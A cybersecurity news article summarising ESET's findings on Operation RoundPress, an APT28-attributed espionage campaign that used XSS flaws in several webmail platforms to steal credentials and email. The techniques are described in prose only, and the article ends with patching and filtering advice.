Russian Hackers Exploit XSS Vulnerabilities to Inject Malicious Code into Email Servers

A sophisticated cyberespionage campaign, dubbed Operation RoundPress, has been uncovered by cybersecurity researchers at ESET.

Attributed with medium confidence to the Russian-linked Sednit group-also known as APT28, Fancy Bear, and Forest Blizzard-this operation targets high-value webmail servers using cross-site scripting (XSS) vulnerabilities.

Active since at least 2004, Sednit has a notorious history, including alleged involvement in the 2016 Democratic National Committee hack.

The group’s latest efforts focus on infiltrating governmental and defense entities worldwide, stealing sensitive data through spearphishing emails that inject malicious JavaScript payloads into victims’ webmail interfaces.

Sednit Group Targets Global Entities

Operation RoundPress initially targeted Roundcube webmail in 2023, exploiting known vulnerabilities like CVE-2020-35730.

By 2024, the campaign expanded to other platforms, including Horde, MDaemon, and Zimbra, exploiting both patched and zero-day flaws.

A notable zero-day XSS vulnerability in MDaemon, identified as CVE-2024-11182, was reported to developers on November 1, 2024, and swiftly patched in version 24.5.1.

According to ESET Report, these attacks primarily target Eastern European entities linked to the Ukraine conflict, such as Ukrainian military and defense firms in Bulgaria and Romania, alongside governments in Africa, Europe, and South America.

The spearphishing emails, often disguised as legitimate news updates, bypass spam filters with convincing subject lines to lure victims into opening them, triggering the XSS exploits that execute malicious scripts directly within the webmail context.

Expanding Attack Vectors

The technical sophistication of Operation RoundPress lies in its tailored JavaScript payloads, named SpyPress, with variants for each webmail platform-SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.

These payloads, heavily obfuscated with randomized variable names and encrypted strings, are designed to steal credentials by creating hidden login forms that trick browsers and password managers into auto-filling sensitive data.

Beyond credential theft, the scripts exfiltrate email messages, contacts, and even bypass two-factor authentication (2FA) in MDaemon by creating app passwords or stealing 2FA secrets.

SpyPress.ROUNDCUBE can also establish Sieve rules to forward incoming emails to attacker-controlled addresses, ensuring persistent data theft even if the malicious email is no longer accessed.

Data exfiltration occurs via HTTP POST requests to hardcoded command-and-control (C&C) servers, using base64-encoded formats to obscure the stolen information.

The compromise chain is meticulously crafted: Sednit sends spearphishing emails with embedded XSS exploits that execute when opened in vulnerable webmail clients.

These emails often mimic legitimate communications, referencing current events or local news to enhance their credibility.

While the payloads lack traditional persistence, their re-execution upon email reopening and features like Sieve rules provide ongoing access to victim data.

The operation’s global reach and focus on defense and governmental sectors underscore its strategic intent, likely tied to geopolitical objectives.

Organizations are urged to update webmail software promptly and enhance email filtering to mitigate such threats, as vulnerabilities in public-facing applications remain a prime vector for espionage groups like Sednit.

Indicators of Compromise (IoCs)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!